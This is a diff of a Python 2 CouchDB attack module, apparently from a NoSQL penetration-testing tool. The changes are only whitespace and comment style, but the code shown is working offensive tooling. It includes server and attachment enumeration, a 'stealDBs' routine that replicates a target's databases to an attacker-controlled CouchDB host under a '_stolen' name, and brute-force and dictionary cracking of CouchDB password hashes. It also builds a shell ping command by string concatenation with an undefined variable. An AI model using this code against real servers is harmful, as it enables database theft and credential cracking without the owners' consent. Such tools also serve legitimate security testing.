1414from hashlib import sha1
1515import os
1616
17+
1718global dbList
1819global yes_tag
1920global no_tag
2021yes_tag = ['y' , 'Y' ]
2122no_tag = ['n' , 'N' ]
2223
24+
2325def couchScan (target ,port ,pingIt ):
2426 if pingIt == True :
2527 test = os .system ("ping -c 1 -n -W 1 " + ip + ">/dev/null" )
@@ -68,7 +70,7 @@ def netAttacks(target,port, myIP):
6870 mgtOpen = False
6971 webOpen = False
7072 mgtSelect = True
71- #This is a global for future use with other modules; may change
73+ # This is a global for future use with other modules; may change
7274 dbList = []
7375 print "Checking to see if credentials are needed..."
7476 needCreds = couchScan (target ,port ,False )
@@ -104,7 +106,7 @@ def netAttacks(target,port, myIP):
104106
105107
106108 mgtUrl = "http://" + target + ":" + str (port ) + "/_utils"
107- #Future rev: Add web management interface parsing
109+ # Future rev: Add web management interface parsing
108110 try :
109111 mgtRespCode = urllib .urlopen (mgtUrl ).getcode ()
110112 if mgtRespCode == 200 :
@@ -142,11 +144,13 @@ def netAttacks(target,port, myIP):
142144 if attack == "5" :
143145 return
144146
147+
145148def getPlatInfo (couchConn , target ):
146149 print "Server Info:"
147150 print "CouchDB Version: " + couchConn .version ()
148151 return
149152
153+
150154def enumAtt (conn ,target ):
151155 dbList = []
152156 print "Enumerating all attachments..."
@@ -208,6 +212,7 @@ def enumDbs (couchConn,target,port):
208212
209213 return
210214
215+
211216def stealDBs (myDB ,couchConn ,target ,port ):
212217 dbLoot = True
213218 menuItem = 1
@@ -234,7 +239,7 @@ def stealDBs (myDB,couchConn,target,port):
234239 break
235240
236241 try :
237- #Create the DB target first
242+ # Create the DB target first
238243 myServer = couchdb .Server ("http://" + myDB + ":5984" )
239244 targetDB = myServer .create (dbList [int (dbLoot )- 1 ] + "_stolen" )
240245 couchConn .replicate (dbList [int (dbLoot )- 1 ],"http://" + myDB + ":5984/" + dbList [int (dbLoot )- 1 ] + "_stolen" )
@@ -251,6 +256,7 @@ def stealDBs (myDB,couchConn,target,port):
251256 raw_input ("Something went wrong. Are you sure your CouchDB is running and options are set? Press enter to return..." )
252257 return
253258
259+
254260def passCrack (user , encPass , salt , dbVer ):
255261 select = True
256262 print "Select password cracking method: "
@@ -273,9 +279,11 @@ def passCrack (user, encPass, salt, dbVer):
273279 return
274280 return
275281
282+
276283def genBrute (chars , maxLen ):
277284 return ('' .join (candidate ) for candidate in itertools .chain .from_iterable (itertools .product (chars , repeat = i ) for i in range (1 , maxLen + 1 )))
278285
286+
279287def brute_pass (hashVal ,salt ,dbVer ):
280288 charSel = True
281289 print "\n "
@@ -313,7 +321,7 @@ def brute_pass(hashVal,salt,dbVer):
313321 print "\r Combinations tested: " + str (count ) + "\r "
314322 count += 1
315323
316- #CouchDB hashing method changed starting with v1.3. Decide based on DB version which hash method to use.
324+ # CouchDB hashing method changed starting with v1.3. Decide based on DB version which hash method to use.
317325 if float (dbVer [0 :3 ]) < 1.3 :
318326 gotIt = gen_pass_couch (attempt ,salt ,hashVal )
319327 else :
@@ -322,6 +330,7 @@ def brute_pass(hashVal,salt,dbVer):
322330 if gotIt == True :
323331 break
324332
333+
325334def dict_pass (key ,salt ,dbVer ):
326335 loadCheck = False
327336
@@ -341,7 +350,7 @@ def dict_pass(key,salt,dbVer):
341350 for passGuess in passList :
342351 temp = passGuess .split ("\n " )[0 ]
343352
344- #CouchDB hashing method changed starting with v1.3. Decide based on DB version which hash method to use.
353+ # CouchDB hashing method changed starting with v1.3. Decide based on DB version which hash method to use.
345354 if float (dbVer [0 :3 ]) < 1.3 :
346355 gotIt = gen_pass_couch (temp ,salt ,key )
347356 else :
@@ -352,6 +361,7 @@ def dict_pass(key,salt,dbVer):
352361
353362 return
354363
364+
355365def gen_pass_couch (passw , salt , hashVal ):
356366 if sha1 (passw + salt ).hexdigest () == hashVal :
357367 print "Password Cracked - " + passw
@@ -360,6 +370,7 @@ def gen_pass_couch(passw, salt, hashVal):
360370 else :
361371 return False
362372
373+
363374def gen_pass_couch13 (passw , salt , iterations , hashVal ):
364375 result = PBKDF2 (passw ,salt ,iterations ).read (20 )
365376 expected = a2b_hex (hashVal )